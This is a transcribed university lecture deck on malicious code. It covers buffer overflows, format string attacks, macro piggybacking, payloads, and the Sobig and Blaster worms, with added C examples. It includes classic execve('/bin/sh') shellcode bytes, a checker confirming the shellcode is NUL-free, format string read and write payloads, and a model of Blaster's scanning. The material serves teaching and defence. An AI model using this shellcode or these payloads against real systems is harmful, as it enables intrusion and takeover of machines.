Malicious Code for Fun and Profit (PowerPoint presentation; slides provided by mihaichris, source: http://pages.cs.wisc.edu)
1
Malicious Code for Fun and Profit
  • Somesh Jha
  • jha@cs.wisc.edu
  • Nov 27, 2007

2
What is Malicious Code?
  • Viruses, worms, trojans, ...
  • Code that breaks your security policy.
  • Characteristics
  • Attack vector
  • Payload
  • Spreading algorithm
3
Outline
  • Attack Vectors
  • Payloads
  • Spreading Algorithms
  • Case Studies

4
Attack Vectors
  • Social engineering
  • Make them want to run it.
  • Vulnerability exploitation
  • Force your way into the system.
  • Piggybacking
  • Make it run when other programs run.

5
Social Engineering
  • Suggest to user that the executable is
  • A game.
  • A desirable picture/movie.
  • An important document.
  • A security update from Microsoft.
  • A security update from the IT department.
  • Spoofing the sender helps.

6
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies

7
Vulnerability Exploitation
  • Make use of flaws in software input handling.
  • Sample techniques
  • Buffer overflow attacks.
  • Format string attacks.
  • Return-to-libc attacks.
  • SQL injection attacks.

8
Basic Principles
Buffer Overflows
  • A buffer overflow occurs when data is stored past
    the boundaries of an array or a string.
  • The additional data overwrites nearby program
    variables (and, on the stack, the saved frame pointer and return address).
  • Result
  • Attacker controls or takes over the
    currently running process.

9
Example
Buffer Overflows
  • Expected input: \\hostname\path

    void process_request(char *req)
    {
        // Get hostname: the characters between the leading "\\" and the next '\'
        char host[20];
        int pos = find_char(req, '\\', 2);        // index of the first '\' at or after offset 2
        strcpy(host, substr(req, 2, pos - 1));    // copies pos - 2 characters plus '\0', with no length check
        ...
        return;
    }

  • find_char() and substr() are helpers the slide leaves undefined.
  • process_request( \\tux12\usr\foo.txt )            -> OK:  hostname "tux12" (5 characters) fits in host.
  • process_request( \\aaabbbcccdddeeefffggghhh\bar ) -> BAD: hostname is 24 characters; host holds at most 19 plus '\0'.
10
Program Stack
Buffer Overflows
  • A stack frame per procedure call: main() calls process_request(), which calls strcpy().
  • Frame of process_request() as drawn in the slides (higher addresses at the top):

    arg req
    return address
    frame pointer
    local pos
    local host (20 bytes)

  • Same code as slide 9:

    void process_request(char *req)
    {
        // Get hostname
        char host[20];
        int pos = find_char(req, '\\', 2);
        strcpy(host, substr(req, 2, pos - 1));
        ...
        return;
    }

16
Normal Execution
Buffer Overflows
process_request( \\tux12\usr\foo.txt )
  • find_char() returns pos = 7, the index of the '\' that ends the hostname.
  • strcpy() writes "tux12" plus '\0' (6 bytes) into host; local pos, the saved frame pointer and the return address are untouched.

18
Overflow Execution
Buffer Overflows
process_request( \\aaabbbcccdddeeefffggghhhiiijjj\bar )
  • find_char() returns pos = 32, so strcpy() writes 30 characters plus '\0' into the 20-byte host.
  • strcpy() writes toward higher addresses: the copy fills host ("aaabbbcccdddeeefffgg"), then overwrites local pos ("ghhh"), the saved frame pointer ("iiij") and three bytes of the return address ("jj" and the terminating '\0').
  • When process_request() returns, control transfers to whatever value now sits in the return-address slot.
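The following C program is an added example, not code from the slides. It supplies the find_char() and substr() helpers the slide leaves undefined (their semantics, a start offset and an inclusive end index, are inferred from the slide's pos = 7 result), keeps the slide's routine as process_request_vulnerable() so the flaw can be read next to the fix, and puts a bounds-checked rewrite, process_request_safe(), beside it. The names process_request_safe(), hostname_is() and request_rejected() and the sample inputs are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_LEN 20   /* same 20-byte buffer as the slide */

/* Index of the first occurrence of c in s at or after offset start, or -1 if absent.
   (Helper assumed by the slide; with start = 2 it skips the leading "\\".) */
int find_char(const char *s, char c, int start)
{
    for (int i = start; s[i] != '\0'; i++)
        if (s[i] == c)
            return i;
    return -1;
}

/* Heap-allocated copy of s[first..last] inclusive; the caller frees it.
   (Helper assumed by the slide.) */
char *substr(const char *s, int first, int last)
{
    size_t len = (last >= first) ? (size_t)(last - first + 1) : 0;
    char *out = malloc(len + 1);
    if (out == NULL)
        abort();
    memcpy(out, s + first, len);
    out[len] = '\0';
    return out;
}

/* The slide's routine with its behaviour unchanged: strcpy() copies the whole
   hostname into a 20-byte stack buffer. Kept only as the "before" picture;
   never call it on untrusted input. */
void process_request_vulnerable(const char *req)
{
    char host[HOST_LEN];
    int pos = find_char(req, '\\', 2);
    char *name = substr(req, 2, pos - 1);
    strcpy(host, name);            /* BUG: overflows host when strlen(name) >= HOST_LEN */
    free(name);
    printf("host=%s\n", host);
}

/* Hardened version: check the shape of the request and bound the copy by the
   caller's buffer size. Returns 0 and fills host on success, -1 on malformed or
   oversized input (which the vulnerable version silently accepts). */
int process_request_safe(const char *req, char *host, size_t host_len)
{
    if (req == NULL || req[0] != '\\' || req[1] != '\\')
        return -1;                               /* must start with "\\" */
    int pos = find_char(req, '\\', 2);
    if (pos < 0)
        return -1;                               /* no "\path" part: malformed */
    size_t name_len = (size_t)pos - 2;
    if (name_len == 0 || name_len >= host_len)
        return -1;                               /* empty, or no room for name + '\0' */
    memcpy(host, req + 2, name_len);
    host[name_len] = '\0';
    return 0;
}

/* Check helpers: 1 if req parses to hostname `expected`; 1 if req is rejected. */
int hostname_is(const char *req, const char *expected)
{
    char host[HOST_LEN];
    return process_request_safe(req, host, sizeof host) == 0 && strcmp(host, expected) == 0;
}

int request_rejected(const char *req)
{
    char host[HOST_LEN];
    return process_request_safe(req, host, sizeof host) == -1;
}

int main(void)
{
    /* Constructed inputs from the slide, written as C literals (each '\' doubled). */
    const char *ok  = "\\\\tux12\\usr\\foo.txt";
    const char *bad = "\\\\aaabbbcccdddeeefffggghhhiiijjj\\bar";
    printf("%s -> %s\n", ok,  hostname_is(ok, "tux12") ? "OK (tux12)" : "rejected");
    printf("%s -> %s\n", bad, request_rejected(bad) ? "rejected" : "OK");
    return 0;
}
```

The rejection threshold is name_len >= host_len, not > host_len: a 20-character hostname fits the bytes of host but leaves no room for the terminator, which is exactly the off-by-one that a naive fix reintroduces.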
19
Smashing the Stack
Buffer Overflows
  • The attacker gets one chance to gain control: the overwritten return address is used exactly once, when the function returns, and a wrong value crashes the process.
  • Craft an input string such that
  • The return address is overwritten with a pointer
    to the malicious code.
  • The malicious code is placed inside the input
    string itself, so it sits in the overflowed buffer at an address the attacker can predict.

Malicious code can create a root shell by
executing /bin/sh (a root shell if the exploited process runs as root).
20
Shell Code
Buffer Overflows
  • Code for execve("/bin/sh"), placed in the input string as raw bytes:

    EB 17 5E 89 76 08 31 C0
    88 46 07 89 46 0C B0 0B
    89 F3 8D 4E 08 31 D2 CD
    80 E8 E4 FF FF FF
    "/bin/sh\0"  followed by argv (arg 1): a pointer to "/bin/sh", then NULL; envp (arg 2) is NULL

  • What those bytes do, as assembly:

    mov edx, arg2        ; envp
    mov ecx, arg1        ; argv
    mov ebx, "/bin/sh"   ; filename
    mov eax, 0Bh         ; execve system call number
    int 80h

  • The remainder of the input string repeats the pointer value that overwrites the return address, pointing back into the buffer at this code.
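Before relying on a payload like this, a practitioner checks two things: that it contains no 0x00 byte (strcpy() would stop copying there, so the tail would never reach the stack) and that the jmp/call/pop trick really leaves the address of "/bin/sh" in esi. The C program below is an added example, not the slide's code: it embeds the slide's bytes and verifies both properties statically by decoding the EB rel8 and E8 rel32 displacements. It does not execute the shellcode (which is 32-bit Linux code). Note that at run time the code also stores a NUL and two pointers at offsets 7 through 15 past the string, so the buffer it lives in must have 16 writable bytes after "/bin/sh".

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The slide's bytes: 30 bytes of code followed by "/bin/sh" (37 bytes total, no
   trailing NUL: the code stores that NUL itself at run time). */
const unsigned char shellcode[] = {
    0xEB, 0x17,                    /* jmp  +0x17 -> the call at offset 25            */
    0x5E,                          /* pop  esi            ; esi = address of "/bin/sh" */
    0x89, 0x76, 0x08,              /* mov  [esi+8], esi   ; argv[0] = "/bin/sh"      */
    0x31, 0xC0,                    /* xor  eax, eax                                   */
    0x88, 0x46, 0x07,              /* mov  [esi+7], al    ; NUL after "/bin/sh"       */
    0x89, 0x46, 0x0C,              /* mov  [esi+12], eax  ; argv[1] = NULL            */
    0xB0, 0x0B,                    /* mov  al, 0x0B       ; execve                    */
    0x89, 0xF3,                    /* mov  ebx, esi       ; filename                  */
    0x8D, 0x4E, 0x08,              /* lea  ecx, [esi+8]   ; argv                      */
    0x31, 0xD2,                    /* xor  edx, edx       ; envp = NULL               */
    0xCD, 0x80,                    /* int  0x80                                       */
    0xE8, 0xE4, 0xFF, 0xFF, 0xFF,  /* call -0x1c -> pop esi, pushing the string's address */
    '/', 'b', 'i', 'n', '/', 's', 'h'
};
const size_t shellcode_len = sizeof shellcode;

/* 1 if buf[0..len) holds no 0x00 byte; a NUL would end a strcpy()-delivered payload early. */
int has_no_nul(const unsigned char *buf, size_t len)
{
    return memchr(buf, 0, len) == NULL;
}

/* Offset reached by the short jump (opcode EB, signed 8-bit displacement) at off. */
size_t jmp_rel8_target(const unsigned char *buf, size_t off)
{
    int8_t rel = (int8_t)buf[off + 1];
    return (size_t)((long)off + 2 + rel);
}

/* Offset reached by the near call (opcode E8, signed 32-bit little-endian displacement) at off. */
size_t call_rel32_target(const unsigned char *buf, size_t off)
{
    uint32_t u = (uint32_t)buf[off + 1] | (uint32_t)buf[off + 2] << 8 |
                 (uint32_t)buf[off + 3] << 16 | (uint32_t)buf[off + 4] << 24;
    int32_t rel = (int32_t)u;
    return (size_t)((long)off + 5 + rel);
}

/* Return address pushed by a call at off: the byte right after the 5-byte instruction. */
size_t call_pushed_address(size_t off)
{
    return off + 5;
}

/* Static check of the jmp/call/pop trick: the jmp lands on the call, the call lands
   on pop esi, the pushed address is the start of "/bin/sh", and no byte is NUL. */
int shellcode_layout_ok(const unsigned char *sc, size_t len)
{
    if (len < 2 || sc[0] != 0xEB)
        return 0;
    size_t call_off = jmp_rel8_target(sc, 0);
    if (call_off + 5 > len || sc[call_off] != 0xE8)
        return 0;
    size_t pop_off = call_rel32_target(sc, call_off);
    if (pop_off >= len || sc[pop_off] != 0x5E)
        return 0;
    size_t str_off = call_pushed_address(call_off);
    if (str_off + 7 > len || memcmp(sc + str_off, "/bin/sh", 7) != 0)
        return 0;
    return has_no_nul(sc, len);
}
```

The NUL check is why the code uses xor eax, eax and mov al, 0x0B instead of mov eax, 0x0B, and why the string's terminator is written at run time rather than stored: every 0x00 that would otherwise appear in the bytes has been engineered out.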
21
Thicker Armor
Buffer Overflows
  • Defense against stack-smashing attacks
  • Bounds-checking.
  • Protection libraries.
  • Non-executable stack.
  • setuid()/chroot().
  • Avoid running programs as root!
  • Address randomization.
  • Behavioral monitoring.

22
More Info
  • Smashing the Stack for Fun and Profit
  • by Aleph One
  • StackGuard, RAD, PaX, ASLR
  • CERT

23
Format String Attacks
Format Strings
  • Another way to illegally control program values.
  • Exploits the design of printf(): the format string decides how many arguments are fetched from the stack and how each one is interpreted.
  • printf( "%s %d", s, x )

24
printf() Operation
Format Strings
  • printf( "%s %d %x", s, x, y )
  • Stack at the call, frame of foo() above the frame of printf(), highest address first:

    y
    x
    s
    format string ptr

  • printf() walks up the stack one slot per conversion: "%s" consumes s, "%d" consumes x, "%x" consumes y. It has no way to know how many arguments were actually passed.
25
Attack 1: Read Any Value
Format Strings
  • What the code says:          printf( str )
  • What the programmer meant:   printf( "%s", str )
  • Stack above the format string pointer (figure): four other slots, then a pointer to the secret key.
  • If str = "%x%x%x%x%s": each %x consumes one of the four slots, and %s then takes the secret key pointer as its argument and prints whatever it points to.
26
Attack 2: Write to Address
Format Strings
  • What the code says: printf( str )
  • Stack above the format string pointer (figure): four other slots, then the slot whose contents are used as the %n target; the figure shows the return address as the goal.
  • If str = "%x%x%x%x%n": the four %x conversions skip the four slots, and %n writes the number of characters printed so far to the address held in the fifth slot. If that slot holds the address of the saved return address (the attacker can plant it there by embedding it in str when str itself lives on the stack), the return address is overwritten; padding the output sets the value written.
27
Defenses
Format Strings
  • Never pass untrusted data as the format argument: write printf( "%s", str ), not printf( str ). The same applies to the rest of the printf family (sprintf, fprintf, syslog, ...).
  • FormatGuard.
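An added example, not from the slides: the vulnerable and the intended call side by side, a check for call sites where a caller-supplied string cannot be kept out of the format position, and the %n write primitive behind Attack 2 with the pointer supplied legitimately. The names log_fmt(), log_unsafe(), log_safe(), format_is_literal(), percent_n_demo() and safe_log_is_verbatim() are chosen here; log_unsafe() is shown but never called, because its behaviour on "%x%x%x%x%s" or "%x%x%x%x%n" is undefined.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Thin vsnprintf wrapper so both call sites below look like the slide's printf(). */
void log_fmt(char *out, size_t out_len, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, out_len, fmt, ap);
    va_end(ap);
}

/* What the code says: the user string IS the format. With conversions in `user`
   this reads (or, with %n, writes) through whatever is on the stack. */
void log_unsafe(char *out, size_t out_len, const char *user)
{
    log_fmt(out, out_len, user);             /* BUG: user controls the format */
}

/* What the programmer meant: user data is an argument, never the format. */
void log_safe(char *out, size_t out_len, const char *user)
{
    log_fmt(out, out_len, "%s", user);
}

/* For call sites that cannot be rewritten: 1 if s contains no conversion
   specification, i.e. every '%' is part of a "%%" escape. */
int format_is_literal(const char *s)
{
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {               /* "%%": literal percent sign */
            i++;
            continue;
        }
        return 0;                            /* "%x", "%s", "%n", or a trailing '%' */
    }
    return 1;
}

/* The primitive behind Attack 2: %n stores the number of characters produced so
   far into the int whose address is the matching argument. Here that address is
   passed honestly; in the attack, the stack slot it is read from is attacker-chosen.
   Returns the stored count, 4 for the format below. */
int percent_n_demo(void)
{
    int count = -1;
    char out[32];
    snprintf(out, sizeof out, "xxxx%n", &count);
    return count;
}

/* Check helper: 1 if log_safe() reproduces `user` byte for byte. */
int safe_log_is_verbatim(const char *user)
{
    char out[64];
    log_safe(out, sizeof out, user);
    return strcmp(out, user) == 0;
}
```

format_is_literal() is a mitigation for legacy code, not a substitute for the "%s" fix: it rejects anything that could be a conversion, including width and length modifiers, because the only safe format is one the program wrote itself.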

28
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies

29
Piggybacking
  • Malicious code injected into a benign program or
    data file.
  • Host file can be
  • An executable.
  • A document with some executable content
  • (Word documents with macros, etc.).

30
Piggybacking Executables
  • Modify the program on disk: patch in a jump to the injected code at a point the program executes.

    jmp evil_code

  • Variations
  • Jump to malicious code only on certain actions.
  • Spread malicious code throughout the program.
31
Piggybacking Documents
  • Documents with macros
  • Microsoft Office supports documents with macros
    scripted in Visual Basic (VBA).
  • Macro triggered on
  • Document open
  • Document close
  • Document save
  • Send document by email

32
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies
  • Defenses

33
Payload
  • Target the interesting data
  • Passwords
  • Financial data
  • User behavior
  • User attention
  • Keylogger
  • Screen scraper
  • Spyware
  • Adware

34
Keylogger Use
35
Screen Scraper Use
36
More Payload Ideas
  • Victim machines are pawns in larger attack
  • Botnets.
  • Distributed denial of service (DDoS).
  • Spam proxies.
  • Anonymous FTP sites.
  • IRC servers.

37
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies
  • Defenses

38
Spreading Methods
  • Depends on the attack vector
  • Email-based -> need email addresses
  • Vulnerability-based -> need IP addresses of hosts running the
    vulnerable service
  • Piggybacking -> need more files to infect

39
Spreading through Email
  • (Figure: malware propagating across the Internet by e-mail.)
40
Vulnerable Target Discovery
  • Need to find Internet (IP) addresses.
  • Scanning
  • Target list
  • Passive (contagion) worms: ride along existing communication instead of scanning.

41
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies

42
Types of Malicious Code
Source: McGraw and Morrisett, "Attacking Malicious Code: A Report to the Infosec Research Council", IEEE Software, Sept./Oct. 2000.
  • Virus
  • Self-replicating, infects programs and documents.
  • e.g. Chernobyl/CIH, Melissa, Elkern
  • Worm
  • Self-replicating, spreads across a network.
  • e.g. ILoveYou, Code Red, B(e)agle, Witty

43
Types of Malicious Code
  • Trojan
  • Malware hidden inside useful programs
  • e.g. NoUpdate, KillAV, Bookmarker
  • Backdoor
  • Tool allowing unauthorized remote access
  • e.g. BackOrifice, SdBot, Subseven

44
Types of Malicious Code
  • Spyware
  • Secretly monitors system activity
  • e.g. ISpynow, KeyLoggerPro, Look2me
  • Adware
  • Monitors user activity for advertising purposes
  • e.g. WildTangent, Gator, BargainBuddy

45
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies Sobig

46
The Sobig Worm
  • Mass-mailing, network-aware worm
  • Multi-stage update capabilities

    Variant   Launch         Deactivation
    Sobig.A   9 Jan. 2003    -
    Sobig.B   18 May 2003    31 May 2003
    Sobig.C   31 May 2003    8 June 2003
    Sobig.D   18 June 2003   2 July 2003
    Sobig.E   25 June 2003   14 July 2003
    Sobig.F   18 Aug 2003    10 Sept 2003
47
Sobig Attack Vector
  • E-mail
  • Network shares
  • Spoofed From: addresses used in the mails (table of From / Subject pairs; senders shown):
  • big@boss.com
  • support@microsoft.com
  • bill@microsoft.com
  • admin@support.com
  • support@yahoo.com
  • Compressed executable attachment with a renamed
    extension.
  • Later variants: attachment inside a ZIP file.

48
Sobig Payload
  • 1st stage
  • Backdoor (Lala)
  • Keylogger
  • 2nd stage
  • Proxy (WinGate)
  • (Figure: the update path runs from the infected host through a Geocities web page to a trojan web server.)
49
Sobig Payload
  • (Figure: trojan web servers 1 ... 22, running on hacked DSL/cable hosts.)
50
Sobig Spreading Algorithm
  • E-mail addresses extracted from files on disk.
  • Network shares automatically discovered.

51
Sobig.F in Numbers
  • Courtesy of MessageLabs.com
  • (Chart of Sobig.F mail volume, August 19 to 23, 2003.)
52
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies Sobig, Blaster

53
The Blaster Worm
  • Multi-stage worm exploiting a Windows vulnerability
  • Timeline figure, July 16 to August 19, 2003 (marks on July 16, 17, 25, 31 and August 11, 13, 15, 17, 19). Events shown:
  • LSD Research exploit released
  • Microsoft releases patch
  • CERT advisory
  • Metasploit refined exploit
  • Blaster appears
  • FRB Atlanta, MD DMV, BMW
  • Scandinavian bank closes all 70 branches
  • 1.2 million hosts infected
54
Blaster Attack Vector
  • Uses a Microsoft Windows RPC DCOM vulnerability.
  • Coding flaw
  • The RPC service passes part of the request to
    function GetMachineName().
  • GetMachineName() copies machine name to a fixed
    32-byte buffer.

55
Blaster Attack Vector
56
Blaster Payload
  • Worm installs itself to start automatically.
  • All infected hosts perform a DDoS against
    windowsupdate.com.
  • SYN flood attack with spoofed source IP,
  • from Aug 15 to Dec 31, and
  • after the 15th of every other month.

57
Blaster Effect on Local Host
  • RPC/DCOM disabled
  • Inability to cut/paste.
  • Inability to move icons.
  • Add/Remove Programs list empty.
  • DLL errors in most Microsoft Office programs.
  • Generally slow, or unresponsive system
    performance.

58
Blaster Spreading Algorithm
  • Build IP address list
  • 40% chance to start with the local IP address.
  • 60% chance to generate a random IP address.
  • Probe 20 IPs at a time.
  • Exploit type
  • 80% Windows XP.
  • 20% Windows 2000.
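The scan loop in code, as an added example (not Blaster's code and not from the slides): a model of the target selection described above with the random draws passed in so the outcome is fixed, and the detection-side check it suggests, a single source contacting 20 consecutive addresses on TCP/135. The model assumes that "start with the local IP address" means the local /24 and that addresses are probed sequentially from the start, as Blaster did; blaster_batch(), blaster_picks_xp(), longest_consecutive_run(), looks_like_blaster_scan() and scan_model_self_check() are names chosen here, and the addresses in the self-check are constructed.

```c
#include <stddef.h>
#include <stdint.h>

#define BATCH 20   /* "Probe 20 IPs at a time" */

/* One scan batch. r_start is a uniform random value deciding local (40%) versus
   random (60%) start; random_ip is the address used in the random case. Writes
   BATCH consecutive targets to out and returns the first one. */
uint32_t blaster_batch(uint32_t local_ip, uint32_t r_start, uint32_t random_ip,
                       uint32_t out[BATCH])
{
    uint32_t base  = (r_start % 100 < 40) ? local_ip : random_ip;
    uint32_t start = base & 0xFFFFFF00u;        /* assumption: scan starts at the /24 base */
    for (int i = 0; i < BATCH; i++)
        out[i] = start + (uint32_t)i;
    return start;
}

/* Exploit offsets chosen per victim: 80% Windows XP, 20% Windows 2000. Returns 1 for XP. */
int blaster_picks_xp(uint32_t r)
{
    return r % 100 < 80;
}

/* Detection side: dst holds, in order, the addresses one source contacted on
   TCP/135. Returns the length of the longest run of consecutive addresses. */
int longest_consecutive_run(const uint32_t *dst, size_t n)
{
    if (n == 0)
        return 0;
    int best = 1, cur = 1;
    for (size_t i = 1; i < n; i++) {
        cur = (dst[i] == dst[i - 1] + 1) ? cur + 1 : 1;
        if (cur > best)
            best = cur;
    }
    return best;
}

/* A run of at least one full batch is the scanner signature the slide describes. */
int looks_like_blaster_scan(const uint32_t *dst, size_t n)
{
    return longest_consecutive_run(dst, n) >= BATCH;
}

/* Self-check on constructed data: a batch from a host at 192.168.1.5 with a
   "local" draw must start at 192.168.1.0, end at 192.168.1.19 and trip the
   detector; a "random" draw must use the random base; four scattered
   connections must not trip it. Returns 1 when all of that holds. */
int scan_model_self_check(void)
{
    uint32_t batch[BATCH];
    uint32_t start = blaster_batch(0xC0A80105u, 7u, 0x0A0B0C0Du, batch);   /* 7 % 100 < 40: local */
    if (start != 0xC0A80100u || batch[BATCH - 1] != 0xC0A80113u)
        return 0;
    if (!looks_like_blaster_scan(batch, BATCH))
        return 0;
    if (blaster_batch(0xC0A80105u, 45u, 0x0A0B0C0Du, batch) != 0x0A0B0C00u) /* 45: random */
        return 0;
    const uint32_t benign[] = { 0xC0A80101u, 0xC0A80105u, 0x0A000001u, 0xC0A80102u };
    if (looks_like_blaster_scan(benign, 4))
        return 0;
    return 1;
}
```

The 40% local bias is what makes a single infected laptop sweep its whole office subnet within minutes; on the detection side, the run-length check is cheap because it needs only the ordered destination list per source, and it is port-agnostic, so the same logic applies to later sequential scanners.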

59
Blaster Infection Rate
60
Outline
  • Attack Vectors
  • Social Engineering
  • Vulnerability Exploitation
  • Piggybacking
  • Payloads
  • Spreading Algorithms
  • Case Studies Sobig, Blaster

61
Short History of Malicious Code: Ancient Times
  • 1981 First virus in the wild
  • Apple II virus Elk Cloner
  • 1983 Term computer virus appears
  • Coined by Fred Cohen
  • 1986 First IBM PC virus
  • Brain virus
  • 1988 First anti-virus program
  • Detects, removes, and immunizes against the
    Brain virus

62
Short History of Malicious Code: Ancient Times
  • 1988 First true worm
  • Morris worm
  • 1989 First slow infector
  • Dark Avenger virus
  • 1989 Full stealth infector
  • Frodo virus

63
Short History of Malicious Code: Middle Ages
  • 1990 Boom in the anti-virus market
  • IBM, McAfee, Digital Dispatch, Iris,
  • 1991(?) First polymorphic virus
  • Chameleon virus
  • 1992 First viral construction set
  • VCL 1.00 Virus Creation Laboratory
  • 1992 First mass media scare
  • Michelangelo virus
  • Anti-virus software sales soar

64
Polymorphic Viruses
  • Encrypted virus body
  • morphed decryption routine

65
Short History of Malicious Code: Renaissance
  • 1992 First polymorphic generator
  • MtE mutation engine
  • 1992 First virus for Windows
  • 1993 First 100% polymorphic virus
  • Bootache virus
  • 1993 First script-kiddie wannabes
  • Enabled by scriptable virus generators
  • Phalcon/Skism Mass-Produced Code generator

66
Short History of Malicious Code: Modern Times 1
  • 1995 First macro virus
  • Concept MS Word macro virus
  • 1996 First macro virus construction set
  • 1996 First Excel macro virus
  • Laroux macro virus
  • 1997 First Linux virus
  • Linux Bliss virus
  • 1997 First mIRC worm

67
Short History of Malicious Code: Modern Times 2
  • 1998 First MS Access macro virus
  • AccessiV virus
  • 1998 First Win32 polymorphic virus
  • Win95.HPS and Win95.Marburg viruses
  • 1998 Chernobyl (CIH) virus epidemic
  • CIH can erase Flash BIOS
  • Thousands of computers infected
  • 1998 First version of BackOrifice
  • Widely-used remote management trojan

68
Short History of Malicious Code: Post-Modern Times 1
  • 1998 First virus to infect Java class files
  • Java.StrangeBrew virus
  • 1999 First macro virus to spread through e-mail
  • Melissa macro virus
  • 2000 I Love You macro virus
  • Spread automatically through e-mail
  • 2001 Code Red worm (I and II)

69
Short History of Malicious Code: Post-Modern Times 2
  • 2001 Sircam worm
  • Spreads through e-mail and network shares
  • 2001 Nimda worm
  • Spreads through backdoors left by Code Red II,
    e-mail, network shares
  • 2002 Klez worm
  • Carries and deploys a virus called Elkern
  • 2003 SQL Slammer worm
  • Fastest infection rate ever

70
z0mbie-6.b: Metamorphic
  • Metamorphic viruses
  • Morph the whole virus body
  • (Figure: virus body and host program as separate blocks.)
71
z0mbie-6.b: Code Integration
  • Integration of virus and program (figure: virus code interleaved with the program)
  • e.g. Mistfall Virus Engine
  • Parse program to infect
  • Insert code where necessary
  • Fix code and data references
  • Rebuild new executable from old program infected
    with virus body

72
Future Threat: Superworm
  • "Curious Yellow: The First Coordinated Worm
    Design", Brandon Wiley
  • Fast replication, adaptability
  • Pre-scan the network for targets.
  • Worm instances communicate to coordinate
    infection process.
  • Attack vectors can be updated.
  • Worm code mutates.

73
Conclusions
  • Vulnerabilities left unpatched can and will be
    used against you.
  • Attackers are more sophisticated.
  • Need to understand the attacker's perspective.

74
Malicious Code for Fun and Profit
  • Somesh Jha
  • jha@cs.wisc.edu
  • Nov 27, 2007